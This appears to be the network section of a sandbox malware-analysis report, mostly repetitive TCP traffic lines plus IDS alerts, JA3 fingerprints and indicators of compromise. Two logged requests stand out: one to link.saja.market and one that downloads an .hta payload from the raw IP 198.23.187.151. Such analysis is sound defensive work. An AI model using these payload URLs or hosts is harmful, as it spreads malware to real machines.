Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 192.168.2.7:49706 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49706
Source: global trafficTCP traffic: 192.168.2.7:49706 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49706 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49706
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49706
Source: global trafficTCP traffic: 192.168.2.7:49706 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49706
Source: global trafficTCP traffic: 192.168.2.7:49706 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49706
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49706
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49706
Source: global trafficTCP traffic: 192.168.2.7:49706 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49706 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49706
Source: global trafficTCP traffic: 192.168.2.7:49706 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49706
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 192.168.2.7:49708 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49708
Source: global trafficTCP traffic: 192.168.2.7:49708 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49708 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49708
Source: global trafficTCP traffic: 192.168.2.7:49709 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49709
Source: global trafficTCP traffic: 192.168.2.7:49709 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49709 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49709
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49709
Source: global trafficTCP traffic: 192.168.2.7:49709 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49709 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49709
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49709
Source: global trafficTCP traffic: 192.168.2.7:49709 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49709
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49708
Source: global trafficTCP traffic: 192.168.2.7:49708 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49708 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49708
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49708
Source: global trafficTCP traffic: 192.168.2.7:49708 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49708
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49709
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49709
Source: global trafficTCP traffic: 192.168.2.7:49709 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49709 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49709
Source: global trafficTCP traffic: 192.168.2.7:49709 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49709
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49708
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49708
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49708
Source: global trafficTCP traffic: 192.168.2.7:49708 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49708 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49708 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.7:49708 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49708
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.7:49708
Source: Joe Sandbox ViewIP Address: 13.107.253.72 13.107.253.72
Source: Joe Sandbox ViewJA3 fingerprint: 6271f898ce5be7dd52b0fc260d0662b3
Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49704 -> 13.107.253.72:443
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49706 -> 13.107.253.72:443
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49707 -> 13.107.253.72:443
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49708 -> 13.107.253.72:443
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49709 -> 13.107.253.72:443
Source: global trafficHTTP traffic detected: GET /qhFdyeUknz?&love=waggish&nephew HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: link.saja.marketConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /xampp/emino/emi/seenbestthingsentiretimetogivemebest.hta HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: 198.23.187.151
Source: unknownTCP traffic detected without corresponding DNS query: 198.23.187.151
Source: unknownTCP traffic detected without corresponding DNS query: 198.23.187.151
Source: unknownTCP traffic detected without corresponding DNS query: 198.23.187.151
Source: unknownTCP traffic detected without corresponding DNS query: 198.23.187.151
Source: unknownTCP traffic detected without corresponding DNS query: 198.23.187.151
Source: unknownTCP traffic detected without corresponding DNS query: 198.23.187.151
Source: unknownTCP traffic detected without corresponding DNS query: 198.23.187.151
Source: unknownTCP traffic detected without corresponding DNS query: 198.23.187.151
Source: unknownTCP traffic detected without corresponding DNS query: 198.23.187.151
Source: unknownTCP traffic detected without corresponding DNS query: 198.23.187.151
Source: unknownTCP traffic detected without corresponding DNS query: 198.23.187.151
Source: unknownTCP traffic detected without corresponding DNS query: 198.23.187.151
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
